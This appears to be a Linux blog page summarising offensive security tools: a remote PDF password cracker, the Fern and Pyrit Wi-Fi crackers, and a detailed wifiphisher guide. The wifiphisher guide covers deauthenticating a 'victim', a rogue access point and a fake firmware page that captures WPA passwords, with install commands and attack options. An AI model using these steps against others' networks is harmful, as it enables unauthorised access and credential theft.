We explored a few options to crack PDF password on Linux in an earlier article. Crackq is a new open source python utility from Hashcrack to do the same. Only in this case the utility sends the block containing the encryption information to Hashcrask server and uses GPU-accelerated brute force against a massive dictionary of 6.3GB to crack the PDF. Continue reading Crackq: crack PDF passwords
Fern is a tool to discover weaknesses in a network. It uses aircrack-ng behind the scenes to achieve this. The best feature of Fern is its excellent GUI written in Python-Qt4. For those who don’t want to get into the cmdline options of complex tools like aircrack-ng, Fern is Godsent. Continue reading Fern: crack WiFi in minutes!
wifiphisher is a semi-automated python utility that tries to reveal the WPA password of a WiFi connection using social engineering. The technique is different from the brute-force attack used in tools like Pyrit. wifiphisher is installed by default on Kali Linux. In this article we will explain how to install and run it on Ubuntu.
wifiphisher uses a 3 stage procedure to retrieve passwords:
- Use DDoS (Denial of Service) methods to disconnect the victim. The tools sends de-authorization packets from the access point to the client and vice versa. It also sends the same to the broadcast address.
- Creates a rogue access point based on the target access point’s settings. It also fakes NAT/DHCP sesrver and does port-forwarding. Due to continuous attacks, the victim is forced to connect to the rogue access point. Hence, a Man in the Middle attack is initiated.
- Once the victim joins the rogue access point, he is served a router configuration page that looks authentic. It prompts for a router firmware upgrade and requests the password. If the victim enters the password, the tool reveals it in the console.
Besides software dependencies, wifiphisher needs two wireless network interfaces, one capable of injection (how to test).
To install wifiphisher on Ubuntu:
$ sudo apt-get install python-scapy tcpdump isc-dhcp-server hostapd $ git clone https://github.com/sophron/wifiphisher.git
To run wifiphisher:
$ cd wifiphisher $ sudo ./wifiphisher.py OR $ sudo python ./wifiphisher.py
The steps beyond this are self-explanatory. wifiphsher detects the accessible access points. You need to press
<Ctrl-c> and enter the access point number of the victim’s WiFi. wifiphisher starts the attack. From here, everything is automatic and if it can lure the victim into entering his/her password, you get it in your console.
Detected Access Point list
A successful attack
|Short form||Long form||Explanation|
|-m||maximum||Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5|
|-n||noupdate||Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n|
|-t||timeinterval||Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like ‘no buffer space’ try: -t .00001|
|-p||packets||Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2|
|-d||directedonly||Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs|
|-a||accesspoint||Enter the MAC address of a specific access point to target|
|-jI||jamminginterface||Choose the interface for jamming. By default script will find the most powerful interface and starts monitor mode on it.|
|-aI||apinterface||Choose the interface for the fake AP. By default script will find the second most powerful interface and starts monitor mode on it.|
Note that wifiphisher may not work under several circumstances – the victim may smell something fishy and back-off or he may not remember the access point password which is often saved and not memorized. In addition, secondary systems would likely trigger warnings when the target is redirected to the cloned login page, mainly because the ‘duped’ page is not created in a secure and authenticated environment.
On GitHub: wifiphisher
Pyrit is a powerful brute-force utility to crack WPA/WPA2-PSK authentication. It can use massive databases to start the attack and can give results relatively faster than common cracking methods. It uses a single MySQL server as database. So it can use this extra space to reduce the time to compute. Quoting from the author: “WPA/WPA2-PSK assigns every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The “shortcut” of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force-attacks against its key negotiation phase; it allows to ultimately reveal the password that protects the network.”. Pyrit is the strongest attack against the widely used WPA/WPA2-PSK authentication protocols at the time of writing.
To install on Ubuntu:
$ sudo apt-get install pyrit
Disclaimer: Pyrit should be used for educational and experimental purposes only and not to snoop on others or invade someone’s privacy.